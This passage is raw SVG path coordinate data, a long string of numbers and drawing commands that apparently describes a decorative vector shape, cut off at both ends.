.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1